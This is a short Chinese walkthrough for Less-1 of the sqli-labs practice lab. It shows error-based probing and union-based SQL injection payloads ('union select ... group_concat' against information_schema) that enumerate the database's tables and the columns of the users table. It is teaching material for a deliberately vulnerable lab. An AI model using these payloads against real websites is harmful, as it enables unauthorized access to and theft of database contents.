sqli-labs-master/Less-1
- 首先打开网页,题目提示输入请输入ID作为带数值的参数
- 可以试一下id=1,2,3
-
id=2 and 1=1 --+;
id=2 and 1=2 --+;
id=2'and 1=1--+;
id=2'and 1=2 --+;分别尝试以上输入,可以判断是字符型sql注入
-
可以尝试用union注入 先用order by 语句
d=2' order by 3 --+
id=-1' union select 1,2,3 --+
id=-1' union select 1,group_concat('</br>',table_name) ,3 from information_schema.tables where table_schema=database() --+
id=-1' union select 1,group_concat('</br>',column_name) ,3 from information_schema.columns where table_schema=database() and table_name='users' --+
测出字段为3 ,再用select语句,发现第二个和第三个字段有回显,最后利用group_concat语句爆出表名,字段名。

浙公网安备 33010602011771号